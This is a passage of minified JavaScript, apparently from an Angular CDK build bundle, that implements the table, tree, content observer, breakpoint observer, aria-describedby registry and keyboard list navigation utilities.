e}_getRenderRowsForData(e,i,n){return this._getRowDefs(e,i).map(c=>{const d=n&&n.has(c)?n.get(c):[];if(d.length){const T=d.shift();return T.dataIndex=i,T}return{data:e,rowDef:c,dataIndex:i}})}_cacheColumnDefs(){this._columnDefsByName.clear(),R3(this._getOwnDefs(this._contentColumnDefs),this._customColumnDefs).forEach(i=>{this._columnDefsByName.has(i.name),this._columnDefsByName.set(i.name,i)})}_cacheRowDefs(){this._headerRowDefs=R3(this._getOwnDefs(this._contentHeaderRowDefs),this._customHeaderRowDefs),this._footerRowDefs=R3(this._getOwnDefs(this._contentFooterRowDefs),this._customFooterRowDefs),this._rowDefs=R3(this._getOwnDefs(this._contentRowDefs),this._customRowDefs);const e=this._rowDefs.filter(i=>!i.when);this._defaultRowDef=e[0]}_renderUpdatedColumns(){const e=(c,d)=>c||!!d.getColumnsDiff(),i=this._rowDefs.reduce(e,!1);i&&this._forceRenderDataRows();const n=this._headerRowDefs.reduce(e,!1);n&&this._forceRenderHeaderRows();const r=this._footerRowDefs.reduce(e,!1);return r&&this._forceRenderFooterRows(),i||n||r}_switchDataSource(e){this._data=[],f3(this.dataSource)&&this.dataSource.disconnect(this),this._renderChangeSubscription&&(this._renderChangeSubscription.unsubscribe(),this._renderChangeSubscription=null),e||(this._dataDiffer&&this._dataDiffer.diff([]),this._rowOutlet.viewContainer.clear()),this._dataSource=e}_observeRenderChanges(){if(!this.dataSource)return;let e;f3(this.dataSource)?e=this.dataSource.connect(this):Cm(this.dataSource)?e=this.dataSource:Array.isArray(this.dataSource)&&(e=Bi(this.dataSource)),this._renderChangeSubscription=e.pipe(ea(this._onDestroy)).subscribe(i=>{this._data=i||[],this.renderRows()})}_forceRenderHeaderRows(){this._headerRowOutlet.viewContainer.length>0&&this._headerRowOutlet.viewContainer.clear(),this._headerRowDefs.forEach((e,i)=>this._renderRow(this._headerRowOutlet,e,i)),this.updateStickyHeaderRowStyles()}_forceRenderFooterRows(){this._footerRowOutlet.viewContainer.length>0&&this._footerRowOutlet.viewContainer.clear(),this._footerRowDefs.forEach((e,i)=>this._renderRow(this._footerRowOutlet,e,i)),this.updateStickyFooterRowStyles()}_addStickyColumnStyles(e,i){const n=Array.from(i.columns||[]).map(d=>this._columnDefsByName.get(d)),r=n.map(d=>d.sticky),c=n.map(d=>d.stickyEnd);this._stickyStyler.updateStickyColumns(e,r,c,!this._fixedLayout||this._forceRecalculateCellWidths)}_getRenderedRows(e){const i=[];for(let n=0;n<e.viewContainer.length;n++){const r=e.viewContainer.get(n);i.push(r.rootNodes[0])}return i}_getRowDefs(e,i){if(1==this._rowDefs.length)return[this._rowDefs[0]];let n=[];if(this.multiTemplateDataRows)n=this._rowDefs.filter(r=>!r.when||r.when(i,e));else{let r=this._rowDefs.find(c=>c.when&&c.when(i,e))||this._defaultRowDef;r&&n.push(r)}return n}_getEmbeddedViewArgs(e,i){return{templateRef:e.rowDef.template,context:{$implicit:e.data},index:i}}_renderRow(e,i,n,r={}){const c=e.viewContainer.createEmbeddedView(i.template,r,n);return this._renderCellTemplateForItem(i,r),c}_renderCellTemplateForItem(e,i){for(let n of this._getCellTemplates(e))Lh.mostRecentCellOutlet&&Lh.mostRecentCellOutlet._viewContainer.createEmbeddedView(n,i);this._changeDetectorRef.markForCheck()}_updateRowIndexContext(){const e=this._rowOutlet.viewContainer;for(let i=0,n=e.length;i<n;i++){const c=e.get(i).context;c.count=n,c.first=0===i,c.last=i===n-1,c.even=i%2==0,c.odd=!c.even,this.multiTemplateDataRows?(c.dataIndex=this._renderRows[i].dataIndex,c.renderIndex=i):c.index=this._renderRows[i].dataIndex}}_getCellTemplates(e){return e&&e.columns?Array.from(e.columns,i=>{const n=this._columnDefsByName.get(i);return e.extractCellTemplate(n)}):[]}_applyNativeTableSections(){const e=this._document.createDocumentFragment(),i=[{tag:"thead",outlets:[this._headerRowOutlet]},{tag:"tbody",outlets:[this._rowOutlet,this._noDataRowOutlet]},{tag:"tfoot",outlets:[this._footerRowOutlet]}];for(const n of i){const r=this._document.createElement(n.tag);r.setAttribute("role","rowgroup");for(const c of n.outlets)r.appendChild(c.elementRef.nativeElement);e.appendChild(r)}this._elementRef.nativeElement.appendChild(e)}_forceRenderDataRows(){this._dataDiffer.diff([]),this._rowOutlet.viewContainer.clear(),this.renderRows()}_checkStickyStates(){const e=(i,n)=>i||n.hasStickyChanged();this._headerRowDefs.reduce(e,!1)&&this.updateStickyHeaderRowStyles(),this._footerRowDefs.reduce(e,!1)&&this.updateStickyFooterRowStyles(),Array.from(this._columnDefsByName.values()).reduce(e,!1)&&(this._stickyColumnStylesNeedReset=!0,this.updateStickyColumnStyles())}_setupStickyStyler(){this._stickyStyler=new bfe(this._isNativeHtmlTable,this.stickyCssClass,this._dir?this._dir.value:"ltr",this._coalescedStyleScheduler,this._platform.isBrowser,this.needsPositionStickyOnElement,this._stickyPositioningListener),(this._dir?this._dir.change:Bi()).pipe(ea(this._onDestroy)).subscribe(i=>{this._stickyStyler.direction=i,this.updateStickyColumnStyles()})}_getOwnDefs(e){return e.filter(i=>!i._table||i._table===this)}_updateNoDataRow(){const e=this._customNoDataRow||this._noDataRow;if(!e)return;const i=0===this._rowOutlet.viewContainer.length;if(i===this._isShowingNoDataRow)return;const n=this._noDataRowOutlet.viewContainer;if(i){const r=n.createEmbeddedView(e.templateRef),c=r.rootNodes[0];1===r.rootNodes.length&&(null==c?void 0:c.nodeType)===this._document.ELEMENT_NODE&&(c.setAttribute("role","row"),c.classList.add(e._contentClassName))}else n.clear();this._isShowingNoDataRow=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cd),Ee(Ma),Ee(mi),Vr("role"),Ee(Cr,8),Ee(ga),Ee(sr),Ee(Ny),Ee(gw),Ee(bm),Ee(vw,12),Ee(qi,8))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-table"],["table","cdk-table",""]],contentQueries:function(e,i,n){if(1&e&&(ha(n,T3,5),ha(n,Nh,5),ha(n,A3,5),ha(n,Uy,5),ha(n,qy,5)),2&e){let r;Vt(r=Bt())&&(i._noDataRow=r.first),Vt(r=Bt())&&(i._contentColumnDefs=r),Vt(r=Bt())&&(i._contentRowDefs=r),Vt(r=Bt())&&(i._contentHeaderRowDefs=r),Vt(r=Bt())&&(i._contentFooterRowDefs=r)}},viewQuery:function(e,i){if(1&e&&(Mi(E3,7),Mi(D3,7),Mi(x3,7),Mi(w3,7)),2&e){let n;Vt(n=Bt())&&(i._rowOutlet=n.first),Vt(n=Bt())&&(i._headerRowOutlet=n.first),Vt(n=Bt())&&(i._footerRowOutlet=n.first),Vt(n=Bt())&&(i._noDataRowOutlet=n.first)}},hostAttrs:[1,"cdk-table"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("cdk-table-fixed-layout",i.fixedLayout)},inputs:{trackBy:"trackBy",dataSource:"dataSource",multiTemplateDataRows:"multiTemplateDataRows",fixedLayout:"fixedLayout"},outputs:{contentChanged:"contentChanged"},exportAs:["cdkTable"],features:[ki([{provide:k1,useExisting:t},{provide:Ny,useClass:gz},{provide:gw,useClass:xz},{provide:vw,useValue:null}])],ngContentSelectors:dfe,decls:6,vars:0,consts:[["headerRowOutlet",""],["rowOutlet",""],["noDataRowOutlet",""],["footerRowOutlet",""]],template:function(e,i){1&e&&(Jn(lfe),va(0),va(1,1),Ir(2,0)(3,1)(4,2)(5,3))},dependencies:[E3,D3,x3,w3],styles:[".cdk-table-fixed-layout{table-layout:fixed}"],encapsulation:2}),t})();function R3(t,a){return t.concat(Array.from(a))}let Aw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Hy]}),t})();class Rz extends class vfe{constructor(){this.expansionModel=new I1(!0)}toggle(a){this.expansionModel.toggle(this._trackByValue(a))}expand(a){this.expansionModel.select(this._trackByValue(a))}collapse(a){this.expansionModel.deselect(this._trackByValue(a))}isExpanded(a){return this.expansionModel.isSelected(this._trackByValue(a))}toggleDescendants(a){this.expansionModel.isSelected(this._trackByValue(a))?this.collapseDescendants(a):this.expandDescendants(a)}collapseAll(){this.expansionModel.clear()}expandDescendants(a){let e=[a];e.push(...this.getDescendants(a)),this.expansionModel.select(...e.map(i=>this._trackByValue(i)))}collapseDescendants(a){let e=[a];e.push(...this.getDescendants(a)),this.expansionModel.deselect(...e.map(i=>this._trackByValue(i)))}_trackByValue(a){return this.trackBy?this.trackBy(a):a}}{constructor(a,e){super(),this.getChildren=a,this.options=e,this.options&&(this.trackBy=this.options.trackBy)}expandAll(){this.expansionModel.clear();const a=this.dataNodes.reduce((e,i)=>[...e,...this.getDescendants(i),i],[]);this.expansionModel.select(...a.map(e=>this._trackByValue(e)))}getDescendants(a){const e=[];return this._getDescendants(e,a),e.splice(1)}_getDescendants(a,e){a.push(e);const i=this.getChildren(e);Array.isArray(i)?i.forEach(n=>this._getDescendants(a,n)):Cm(i)&&i.pipe(Cn(1),Dn(Boolean)).subscribe(n=>{for(const r of n)this._getDescendants(a,r)})}}const S3=new ni("CDK_TREE_NODE_OUTLET_NODE");let Gy=(()=>{class t{constructor(e,i){this.viewContainer=e,this._node=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(S3,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeOutlet",""]]}),t})();class Afe{constructor(a){this.$implicit=a}}let k3=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeDef",""]],inputs:{when:["cdkTreeNodeDefWhen","when"]}}),t})(),zh=(()=>{class t{constructor(e,i){this._differs=e,this._changeDetectorRef=i,this._onDestroy=new J,this._levels=new Map,this.viewChange=new zs({start:0,end:Number.MAX_VALUE})}get dataSource(){return this._dataSource}set dataSource(e){this._dataSource!==e&&this._switchDataSource(e)}ngOnInit(){this._dataDiffer=this._differs.find([]).create(this.trackBy)}ngOnDestroy(){this._nodeOutlet.viewContainer.clear(),this.viewChange.complete(),this._onDestroy.next(),this._onDestroy.complete(),this._dataSource&&"function"==typeof this._dataSource.disconnect&&this.dataSource.disconnect(this),this._dataSubscription&&(this._dataSubscription.unsubscribe(),this._dataSubscription=null)}ngAfterContentChecked(){const e=this._nodeDefs.filter(i=>!i.when);this._defaultNodeDef=e[0],this.dataSource&&this._nodeDefs&&!this._dataSubscription&&this._observeRenderChanges()}_switchDataSource(e){this._dataSource&&"function"==typeof this._dataSource.disconnect&&this.dataSource.disconnect(this),this._dataSubscription&&(this._dataSubscription.unsubscribe(),this._dataSubscription=null),e||this._nodeOutlet.viewContainer.clear(),this._dataSource=e,this._nodeDefs&&this._observeRenderChanges()}_observeRenderChanges(){let e;f3(this._dataSource)?e=this._dataSource.connect(this):Cm(this._dataSource)?e=this._dataSource:Array.isArray(this._dataSource)&&(e=Bi(this._dataSource)),e&&(this._dataSubscription=e.pipe(ea(this._onDestroy)).subscribe(i=>this.renderNodeChanges(i)))}renderNodeChanges(e,i=this._dataDiffer,n=this._nodeOutlet.viewContainer,r){const c=i.diff(e);!c||(c.forEachOperation((d,T,k)=>{if(null==d.previousIndex)this.insertNode(e[k],k,n,r);else if(null==k)n.remove(T),this._levels.delete(d.item);else{const q=n.get(T);n.move(q,k)}}),this._changeDetectorRef.detectChanges())}_getNodeDef(e,i){return 1===this._nodeDefs.length?this._nodeDefs.first:this._nodeDefs.find(r=>r.when&&r.when(i,e))||this._defaultNodeDef}insertNode(e,i,n,r){const c=this._getNodeDef(e,i),d=new Afe(e);d.level=this.treeControl.getLevel?this.treeControl.getLevel(e):void 0!==r&&this._levels.has(r)?this._levels.get(r)+1:0,this._levels.set(e,d.level),(n||this._nodeOutlet.viewContainer).createEmbeddedView(c.template,d,i),hu.mostRecentTreeNode&&(hu.mostRecentTreeNode.data=e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cd),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-tree"]],contentQueries:function(e,i,n){if(1&e&&ha(n,k3,5),2&e){let r;Vt(r=Bt())&&(i._nodeDefs=r)}},viewQuery:function(e,i){if(1&e&&Mi(Gy,7),2&e){let n;Vt(n=Bt())&&(i._nodeOutlet=n.first)}},hostAttrs:["role","tree",1,"cdk-tree"],inputs:{dataSource:"dataSource",treeControl:"treeControl",trackBy:"trackBy"},exportAs:["cdkTree"],decls:1,vars:0,consts:[["cdkTreeNodeOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Gy],encapsulation:2}),t})(),hu=(()=>{class t{constructor(e,i){this._elementRef=e,this._tree=i,this._destroyed=new J,this._dataChanges=new J,t.mostRecentTreeNode=this,this.role="treeitem"}get role(){return"treeitem"}set role(e){this._elementRef.nativeElement.setAttribute("role",e)}get data(){return this._data}set data(e){e!==this._data&&(this._data=e,this._setRoleFromData(),this._dataChanges.next())}get isExpanded(){return this._tree.treeControl.isExpanded(this._data)}get level(){return this._tree.treeControl.getLevel?this._tree.treeControl.getLevel(this._data):this._parentNodeAriaLevel}ngOnInit(){this._parentNodeAriaLevel=function Tfe(t){let a=t.parentElement;for(;a&&!Efe(a);)a=a.parentElement;return a?a.classList.contains("cdk-nested-tree-node")?Uo(a.getAttribute("aria-level")):0:-1}(this._elementRef.nativeElement),this._elementRef.nativeElement.setAttribute("aria-level",`${this.level+1}`)}ngOnDestroy(){t.mostRecentTreeNode===this&&(t.mostRecentTreeNode=null),this._dataChanges.complete(),this._destroyed.next(),this._destroyed.complete()}focus(){this._elementRef.nativeElement.focus()}_setRoleFromData(){this.role="treeitem"}}return t.mostRecentTreeNode=null,t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh))},t.\u0275dir=Ot({type:t,selectors:[["cdk-tree-node"]],hostAttrs:[1,"cdk-tree-node"],hostVars:1,hostBindings:function(e,i){2&e&&Rt("aria-expanded",i.isExpanded)},inputs:{role:"role"},exportAs:["cdkTreeNode"]}),t})();function Efe(t){const a=t.classList;return!(!(null==a?void 0:a.contains("cdk-nested-tree-node"))&&!(null==a?void 0:a.contains("cdk-tree")))}let Tw=(()=>{class t extends hu{constructor(e,i,n){super(e,i),this._differs=n}ngAfterContentInit(){this._dataDiffer=this._differs.find([]).create(this._tree.trackBy);const e=this._tree.treeControl.getChildren(this.data);Array.isArray(e)?this.updateChildrenNodes(e):Cm(e)&&e.pipe(ea(this._destroyed)).subscribe(i=>this.updateChildrenNodes(i)),this.nodeOutlet.changes.pipe(ea(this._destroyed)).subscribe(()=>this.updateChildrenNodes())}ngOnInit(){super.ngOnInit()}ngOnDestroy(){this._clear(),super.ngOnDestroy()}updateChildrenNodes(e){const i=this._getNodeOutlet();e&&(this._children=e),i&&this._children?this._tree.renderNodeChanges(this._children,this._dataDiffer,i.viewContainer,this._data):this._dataDiffer.diff([])}_clear(){const e=this._getNodeOutlet();e&&(e.viewContainer.clear(),this._dataDiffer.diff([]))}_getNodeOutlet(){const e=this.nodeOutlet;return e&&e.find(i=>!i._node||i._node===this)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Ee(Cd))},t.\u0275dir=Ot({type:t,selectors:[["cdk-nested-tree-node"]],contentQueries:function(e,i,n){if(1&e&&ha(n,Gy,5),2&e){let r;Vt(r=Bt())&&(i.nodeOutlet=r)}},hostAttrs:[1,"cdk-nested-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex"},exportAs:["cdkNestedTreeNode"],features:[ki([{provide:hu,useExisting:t},{provide:S3,useExisting:t}]),ci]}),t})(),Dw=(()=>{class t{constructor(e,i){this._tree=e,this._treeNode=i,this._recursive=!1}get recursive(){return this._recursive}set recursive(e){this._recursive=wi(e)}_toggle(e){this.recursive?this._tree.treeControl.toggleDescendants(this._treeNode.data):this._tree.treeControl.toggle(this._treeNode.data),e.stopPropagation()}}return t.\u0275fac=function(e){return new(e||t)(Ee(zh),Ee(hu))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeToggle",""]],hostBindings:function(e,i){1&e&&he("click",function(r){return i._toggle(r)})},inputs:{recursive:["cdkTreeNodeToggleRecursive","recursive"]}}),t})(),xw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function Zr(t,...a){return a.length?a.some(e=>t[e]):t.altKey||t.shiftKey||t.ctrlKey||t.metaKey}function dp(t,a=Vy){return Ie((e,i)=>{let n=null,r=null,c=null;const d=()=>{if(n){n.unsubscribe(),n=null;const k=r;r=null,i.next(k)}};function T(){const k=c+t,q=a.now();if(q<k)return n=this.schedule(void 0,k-q),void i.add(n);d()}e.subscribe(Ae(i,k=>{r=k,c=a.now(),n||(n=a.schedule(T,t),i.add(n))},()=>{d(),i.complete()},void 0,()=>{r=n=null}))})}function Sw(t){return Dn((a,e)=>t<=e)}function Bh(t,a=A){return t=null!=t?t:Ffe,Ie((e,i)=>{let n,r=!0;e.subscribe(Ae(i,c=>{const d=a(c);(r||!t(n,d))&&(r=!1,n=d,i.next(c))}))})}function Ffe(t,a){return t===a}let Pz=(()=>{class t{create(e){return"undefined"==typeof MutationObserver?null:new MutationObserver(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Vfe=(()=>{class t{constructor(e){this._mutationObserverFactory=e,this._observedElements=new Map}ngOnDestroy(){this._observedElements.forEach((e,i)=>this._cleanupObserver(i))}observe(e){const i=Gr(e);return new G(n=>{const c=this._observeElement(i).subscribe(n);return()=>{c.unsubscribe(),this._unobserveElement(i)}})}_observeElement(e){if(this._observedElements.has(e))this._observedElements.get(e).count++;else{const i=new J,n=this._mutationObserverFactory.create(r=>i.next(r));n&&n.observe(e,{characterData:!0,childList:!0,subtree:!0}),this._observedElements.set(e,{observer:n,stream:i,count:1})}return this._observedElements.get(e).stream}_unobserveElement(e){this._observedElements.has(e)&&(this._observedElements.get(e).count--,this._observedElements.get(e).count||this._cleanupObserver(e))}_cleanupObserver(e){if(this._observedElements.has(e)){const{observer:i,stream:n}=this._observedElements.get(e);i&&i.disconnect(),n.complete(),this._observedElements.delete(e)}}}return t.\u0275fac=function(e){return new(e||t)(At(Pz))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),P3=(()=>{class t{constructor(e,i,n){this._contentObserver=e,this._elementRef=i,this._ngZone=n,this.event=new Tt,this._disabled=!1,this._currentSubscription=null}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._disabled?this._unsubscribe():this._subscribe()}get debounce(){return this._debounce}set debounce(e){this._debounce=Uo(e),this._subscribe()}ngAfterContentInit(){!this._currentSubscription&&!this.disabled&&this._subscribe()}ngOnDestroy(){this._unsubscribe()}_subscribe(){this._unsubscribe();const e=this._contentObserver.observe(this._elementRef);this._ngZone.runOutsideAngular(()=>{this._currentSubscription=(this.debounce?e.pipe(dp(this.debounce)):e).subscribe(this.event)})}_unsubscribe(){var e;null===(e=this._currentSubscription)||void 0===e||e.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Vfe),Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["","cdkObserveContent",""]],inputs:{disabled:["cdkObserveContentDisabled","disabled"],debounce:"debounce"},outputs:{event:"cdkObserveContent"},exportAs:["cdkObserveContent"]}),t})(),$y=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Pz]}),t})();const Oz=new Set;let N1,Bfe=(()=>{class t{constructor(e){this._platform=e,this._matchMedia=this._platform.isBrowser&&window.matchMedia?window.matchMedia.bind(window):Ufe}matchMedia(e){return(this._platform.WEBKIT||this._platform.BLINK)&&function Hfe(t){if(!Oz.has(t))try{N1||(N1=document.createElement("style"),N1.setAttribute("type","text/css"),document.head.appendChild(N1)),N1.sheet&&(N1.sheet.insertRule(`@media ${t} {body{ }}`,0),Oz.add(t))}catch(a){console.error(a)}}(e),this._matchMedia(e)}}return t.\u0275fac=function(e){return new(e||t)(At(sr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ufe(t){return{matches:"all"===t||""===t,media:t,addListener:()=>{},removeListener:()=>{}}}let O3=(()=>{class t{constructor(e,i){this._mediaMatcher=e,this._zone=i,this._queries=new Map,this._destroySubject=new J}ngOnDestroy(){this._destroySubject.next(),this._destroySubject.complete()}isMatched(e){return Nz(Oy(e)).some(n=>this._registerQuery(n).mql.matches)}observe(e){let r=ug(Nz(Oy(e)).map(c=>this._registerQuery(c).observable));return r=hg(r.pipe(Cn(1)),r.pipe(Sw(1),dp(0))),r.pipe(Xe(c=>{const d={matches:!1,breakpoints:{}};return c.forEach(({matches:T,query:k})=>{d.matches=d.matches||T,d.breakpoints[k]=T}),d}))}_registerQuery(e){if(this._queries.has(e))return this._queries.get(e);const i=this._mediaMatcher.matchMedia(e),r={observable:new G(c=>{const d=T=>this._zone.run(()=>c.next(T));return i.addListener(d),()=>{i.removeListener(d)}}).pipe(Ro(i),Xe(({matches:c})=>({query:e,matches:c})),ea(this._destroySubject)),mql:i};return this._queries.set(e,r),r}}return t.\u0275fac=function(e){return new(e||t)(At(Bfe),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Nz(t){return t.map(a=>a.split(",")).reduce((a,e)=>a.concat(e)).map(a=>a.trim())}function N3(t,a){return(t.getAttribute(a)||"").match(/\S+/g)||[]}const Wz="cdk-describedby-message",L3="cdk-describedby-host";let kw=0,Pw=(()=>{class t{constructor(e,i){this._platform=i,this._messageRegistry=new Map,this._messagesContainer=null,this._id=""+kw++,this._document=e,this._id=Po(h1)+"-"+kw++}describe(e,i,n){if(!this._canBeDescribed(e,i))return;const r=Ow(i,n);"string"!=typeof i?(Fz(i,this._id),this._messageRegistry.set(r,{messageElement:i,referenceCount:0})):this._messageRegistry.has(r)||this._createMessageElement(i,n),this._isElementDescribedByMessage(e,r)||this._addMessageReference(e,r)}removeDescription(e,i,n){var r;if(!i||!this._isElementNode(e))return;const c=Ow(i,n);if(this._isElementDescribedByMessage(e,c)&&this._removeMessageReference(e,c),"string"==typeof i){const d=this._messageRegistry.get(c);d&&0===d.referenceCount&&this._deleteMessageElement(c)}0===(null===(r=this._messagesContainer)||void 0===r?void 0:r.childNodes.length)&&(this._messagesContainer.remove(),this._messagesContainer=null)}ngOnDestroy(){var e;const i=this._document.querySelectorAll(`[${L3}="${this._id}"]`);for(let n=0;n<i.length;n++)this._removeCdkDescribedByReferenceIds(i[n]),i[n].removeAttribute(L3);null===(e=this._messagesContainer)||void 0===e||e.remove(),this._messagesContainer=null,this._messageRegistry.clear()}_createMessageElement(e,i){const n=this._document.createElement("div");Fz(n,this._id),n.textContent=e,i&&n.setAttribute("role",i),this._createMessagesContainer(),this._messagesContainer.appendChild(n),this._messageRegistry.set(Ow(e,i),{messageElement:n,referenceCount:0})}_deleteMessageElement(e){var i,n;null===(n=null===(i=this._messageRegistry.get(e))||void 0===i?void 0:i.messageElement)||void 0===n||n.remove(),this._messageRegistry.delete(e)}_createMessagesContainer(){if(this._messagesContainer)return;const e="cdk-describedby-message-container",i=this._document.querySelectorAll(`.${e}[platform="server"]`);for(let r=0;r<i.length;r++)i[r].remove();const n=this._document.createElement("div");n.style.visibility="hidden",n.classList.add(e),n.classList.add("cdk-visually-hidden"),this._platform&&!this._platform.isBrowser&&n.setAttribute("platform","server"),this._document.body.appendChild(n),this._messagesContainer=n}_removeCdkDescribedByReferenceIds(e){const i=N3(e,"aria-describedby").filter(n=>0!=n.indexOf(Wz));e.setAttribute("aria-describedby",i.join(" "))}_addMessageReference(e,i){const n=this._messageRegistry.get(i);(function qfe(t,a,e){const i=N3(t,a);i.some(n=>n.trim()==e.trim())||(i.push(e.trim()),t.setAttribute(a,i.join(" ")))})(e,"aria-describedby",n.messageElement.id),e.setAttribute(L3,this._id),n.referenceCount++}_removeMessageReference(e,i){const n=this._messageRegistry.get(i);n.referenceCount--,function Gfe(t,a,e){const n=N3(t,a).filter(r=>r!=e.trim());n.length?t.setAttribute(a,n.join(" ")):t.removeAttribute(a)}(e,"aria-describedby",n.messageElement.id),e.removeAttribute(L3)}_isElementDescribedByMessage(e,i){const n=N3(e,"aria-describedby"),r=this._messageRegistry.get(i),c=r&&r.messageElement.id;return!!c&&-1!=n.indexOf(c)}_canBeDescribed(e,i){if(!this._isElementNode(e))return!1;if(i&&"object"==typeof i)return!0;const n=null==i?"":`${i}`.trim(),r=e.getAttribute("aria-label");return!(!n||r&&r.trim()===n)}_isElementNode(e){return e.nodeType===this._document.ELEMENT_NODE}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(sr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ow(t,a){return"string"==typeof t?`${a||""}/${t}`:t}function Fz(t,a){t.id||(t.id=`${Wz}-${a}-${kw++}`)}class Vz{constructor(a){this._items=a,this._activeItemIndex=-1,this._activeItem=null,this._wrap=!1,this._letterKeyStream=new J,this._typeaheadSubscription=I.EMPTY,this._vertical=!0,this._allowedModifierKeys=[],this._homeAndEnd=!1,this._skipPredicateFn=e=>e.disabled,this._pressedLetters=[],this.tabOut=new J,this.change=new J,a instanceof gd&&a.changes.subscribe(e=>{if(this._activeItem){const n=e.toArray().indexOf(this._activeItem);n>-1&&n!==this._activeItemIndex&&(this._activeItemIndex=n)}})}skipPredicate(a){return this._skipPredicateFn=a,this}withWrap(a=!0){return this._wrap=a,this}withVerticalOrientation(a=!0){return this._vertical=a,this}withHorizontalOrientation(a){return this._horizontal=a,this}withAllowedModifierKeys(a){return this._allowedModifierKeys=a,this}withTypeAhead(a=200){return this._typeaheadSubscription.unsubscribe(),this._typeaheadSubscription=this._letterKeyStream.pipe(qr(e=>this._pressedLetters.push(e)),dp(a),Dn(()=>this._pressedLetters.length>0),Xe(()=>this._pressedLetters.join(""))).subscribe(e=>{const i=this._getItemsArray();for(let n=1;n<i.length+1;n++){const r=(this._activeItemIndex+n)%i.length,c=i[r];if(!this._skipPredicateFn(c)&&0===c.getLabel().toUpperCase().trim().indexOf(e)){this.setActiveItem(r);break}}this._pressedLetters=[]}),this}withHomeAndEnd(a=!0){return this._homeAndEnd=a,this}setActiveItem(a){const e=this._activeItem;this.updateActiveItem(a),this._activeItem!==e&&this.change.next(this._activeItemIndex)}onKeydown(a){const e=a.keyCode,n=["altKey","ctrlKey","metaKey","shiftKey"].every(r=>!a[r]||this._allowedModifierKeys.indexOf(r)>-1);switch(e){case 9:return void this.tabOut.next();case 40:if(this._vertical&&n){this.setNextItemActive();break}return;case 38:if(this._vertical&&n){this.setPreviousItemActive();break}return;case 39:if(this._horizontal&&n){"rtl"===this._horizontal?this.setPreviousItemActive():this.setNextItemActive();break}return;case 37:if(this._horizontal&&n){"rtl"===this._horizontal?this.setNextItemActive():this.setPreviousItemActive();break}return;case 36:if(this._homeAndEnd&&n){this.setFirstItemActive();break}return;case 35:if(this._homeAndEnd&&n){this.setLastItemActive();break}return;default:return void((n||Zr(a,"shiftKey"))&&(a.key&&1===a.key.length?this._letterKeyStream.next(a.key.toLocaleUpperCase()):(e>=65&&e<=90||e>=48&&e<=57)&&this._letterKeyStream.next(String.fromCharCode(e))))}this._pressedLetters=[],a.preventDefault()}get activeItemIndex(){return this._activeItemIndex}get activeItem(){return this._activeItem}isTyping(){return this._pressedLetters.length>0}setFirstItemActive(){this._setActiveItemByIndex(0,1)}setLastItemActive(){this._setActiveItemByIndex(this._items.length-1,-1)}setNextItemActive(){this._activeItemIndex<0?this.setFirstItemActive():this._setActiveItemByDelta(1)}setPreviousItemActive(){this._activeItemIndex<0&&this._wrap?this.setLastItemActive():this._setActiveItemByDelta(-1)}updateActiveItem(a){const e=this._getItemsArray(),i="number"==typeof a?a:e.indexOf(a),n=e[i];this._activeItem=null==n?null:n,this._activeItemIndex=i}_setActiveItemByDelta(a){this._wrap?this._setActiveInWrapMode(a):this._setActiveInDefaultMode(a)}_setActiveInWrapMode(a){const e=this._getItemsArray();for(let i=1;i<=e.length;i++){const n=(this._activeItemIndex+a*i+e.length)%e.length;if(!this._skipPredicateFn(e[n]))return void this.setActiveItem(n)}}_setActiveInDefaultMode(a){this._setActiveItemByIndex(this._activeItemIndex+a,a)}_setActiveItemByIndex(a,e){const i=this._getItemsArray();if(i[a]){for(;this._skipPredicateFn(i[a]);)if(!i[a+=e])return;this.setActiveItem(a)}}_getItemsArray(){return this._items instanceof gd?this._items.toArray():this._items}}class Bz extends Vz{setActiveItem(a){this.activeItem&&this.activeItem.setInactiveStyles(),super.setActiveItem(a),this.activeItem&&this.activeItem.setActiveStyles()}}class L1 extends Vz{constructor(){super(...arguments),this._origin="program"}setFocusOrigin(a){return this._origin=a,this}setActiveItem(a){super.setActiveItem(a),this.activeItem&&this.activeItem.focus(this._origin)}}let Ky=(()=>{class t{constructor(e){this._platform=e}isDisabled(e){return e.hasAttribute("disabled")}isVisible(e){return function Qfe(t){return!!(t.offsetWidth||t.offsetHeight||"function"==typeof t.getClientRects&&t.getClientRects().length)}(e)&&"visible"===getComputedStyle(e).visibility}isTabbable(e){if(!this._platform.isBrowser)return!1;const i=function jfe(t){try{return t.frameElement}catch(a){return null}}(function tpe(t){return t.ownerDocument&&t.ownerDocument.defaultView||window}(e));if(i&&(-1===Uz(i)||!this.isVisible(i)))return!1;let n=e.nodeName.toLowerCase(),r=Uz(e);return e.hasAttribute("contenteditable")?-1!==r:!("iframe"===n||"object"===n||this._platform.WEBKIT&&this._platform.IOS&&!function Zfe(t){let 